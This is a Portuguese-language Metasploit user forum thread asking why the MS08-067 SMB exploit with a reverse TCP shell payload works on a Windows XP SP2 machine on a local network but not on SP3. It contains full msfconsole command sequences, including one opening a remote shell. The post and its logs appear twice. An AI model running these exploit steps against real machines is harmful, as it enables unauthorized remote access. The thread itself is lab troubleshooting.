Alguem pode me ajudar? Metasploit ( windows/smb/ms08_067_netapi )
681 views
Skip to first unread message
bruc3
Nov 9, 2009, 10:04:09 AM11/9/09
to Metasploit Brasil
-> Alguem pode me ajudar?
Estou usando o metasploit 3.3dev Linux ( slackware 12.1 )
Usando o exploit windows/smb/ms08_067_netapi com o payload windows/
shell/reverse_tcp
eu consigo tranquiLamente obter acesso em uma maquina ( rede local )
rodando o payload
que obtenho a shell ( Ms DoS ). Isso quando e Windows XP SP2
Quando eu tento em uma maquina Windows XP SP3, eu nao consigo, usei o
mesmo metodo.
Lembrando que dando um $info Windows/smb/ms08_067_netapi . ele me
mostra o
Windows XP SP3 Portuguese Brazil (NX), eu setei o target 0, que e
automatico.
como voces podem ver abaixo, deu erro.
Entao setei o target do OS. ( Windows XP SP3 Portuguese BRAZIL (NX )
que e target 53
e tambem nao estabeleceu conexao.
O firewall de ambos estao desativados.
Alguem pode me dizer o que esta acontecendo?
Agradeco desde ja.
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER,
SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread,
process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set rhost 192.168.2.100
rhost => 192.168.2.100
msf exploit(ms08_067_netapi) > set lhost 192.168.2.102
lhost => 192.168.2.102
msf exploit(ms08_067_netapi) > set target 0
target => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Portuguese -
Brazilian
[*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.2.102:4444 ->
192.168.2.100:2346)
Microsoft Windows XP [versÆo 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ../..
cd ../..
C:\>ipconfig
ipconfig
Configuração de IP do Windows
Adaptador Ethernet Conexão local:
Sufixo DNS específico de conexão . :
Endereço IP . . . . . . . . . . . . : 192.168.2.100
Máscara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padrão. . . . . . . . . . . : 192.168.2.254
C:\>
--------------------------------------------------------------
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.2.101
rhost => 192.168.2.101
msf exploit(ms08_067_netapi) > set lhost 192.168.2.102
lhost => 192.168.2.102
msf exploit(ms08_067_netapi) > set target 0
target => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:Portuguese -
Brazilian
[*] Selected Target: Windows XP SP3 Portuguese - Brazilian (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
------------------------------------------------------------------------------
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/
reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.2.101
rhost => 192.168.2.101
msf exploit(ms08_067_netapi) > set lhost 192.168.2.102
lhost => 192.168.2.102
msf exploit(ms08_067_netapi) > set target 53
target => 53
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.2.101 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER,
SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread,
process
LHOST 192.168.2.102 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
53 Windows XP SP3 Portuguese - Brazilian (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
Estou usando o metasploit 3.3dev Linux ( slackware 12.1 )
Usando o exploit windows/smb/ms08_067_netapi com o payload windows/
shell/reverse_tcp
eu consigo tranquiLamente obter acesso em uma maquina ( rede local )
rodando o payload
que obtenho a shell ( Ms DoS ). Isso quando e Windows XP SP2
Quando eu tento em uma maquina Windows XP SP3, eu nao consigo, usei o
mesmo metodo.
Lembrando que dando um $info Windows/smb/ms08_067_netapi . ele me
mostra o
Windows XP SP3 Portuguese Brazil (NX), eu setei o target 0, que e
automatico.
como voces podem ver abaixo, deu erro.
Entao setei o target do OS. ( Windows XP SP3 Portuguese BRAZIL (NX )
que e target 53
e tambem nao estabeleceu conexao.
O firewall de ambos estao desativados.
Alguem pode me dizer o que esta acontecendo?
Agradeco desde ja.
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER,
SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread,
process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set rhost 192.168.2.100
rhost => 192.168.2.100
msf exploit(ms08_067_netapi) > set lhost 192.168.2.102
lhost => 192.168.2.102
msf exploit(ms08_067_netapi) > set target 0
target => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Portuguese -
Brazilian
[*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.2.102:4444 ->
192.168.2.100:2346)
Microsoft Windows XP [versÆo 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ../..
cd ../..
C:\>ipconfig
ipconfig
Configuração de IP do Windows
Adaptador Ethernet Conexão local:
Sufixo DNS específico de conexão . :
Endereço IP . . . . . . . . . . . . : 192.168.2.100
Máscara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padrão. . . . . . . . . . . : 192.168.2.254
C:\>
--------------------------------------------------------------
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.2.101
rhost => 192.168.2.101
msf exploit(ms08_067_netapi) > set lhost 192.168.2.102
lhost => 192.168.2.102
msf exploit(ms08_067_netapi) > set target 0
target => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:Portuguese -
Brazilian
[*] Selected Target: Windows XP SP3 Portuguese - Brazilian (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
------------------------------------------------------------------------------
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/
reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.2.101
rhost => 192.168.2.101
msf exploit(ms08_067_netapi) > set lhost 192.168.2.102
lhost => 192.168.2.102
msf exploit(ms08_067_netapi) > set target 53
target => 53
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.2.101 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER,
SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread,
process
LHOST 192.168.2.102 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
53 Windows XP SP3 Portuguese - Brazilian (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
WoSH
Nov 12, 2009, 6:25:47 PM11/12/09
to metasplo...@googlegroups.com
possivelmente ela nao esta' vulnera'vel. Tente passar algum scanner
(Nessus) e confira se o host esta' vulneravel, pode ser que voce ja'
tenha aplicado a correcao da falha "sem querer".
boa sorte.
2009/11/9 bruc3 <jogop...@gmail.com>:
(Nessus) e confira se o host esta' vulneravel, pode ser que voce ja'
tenha aplicado a correcao da falha "sem querer".
boa sorte.
2009/11/9 bruc3 <jogop...@gmail.com>:
Paulo Souza
May 20, 2017, 2:09:00 AM5/20/17
to Metasploit Brasil
Estou tento esse problema mencionado pelo BRUC3. Alguem tem a solução?
Spyman
May 20, 2017, 10:42:49 AM5/20/17
to Metasploit Brasil
Esse, em especifico, fala algumas coisas que nao concordo muito sobre usar VM, mas serve como pesquisa para outros.
Reply all
Reply to author
Forward
0 new messages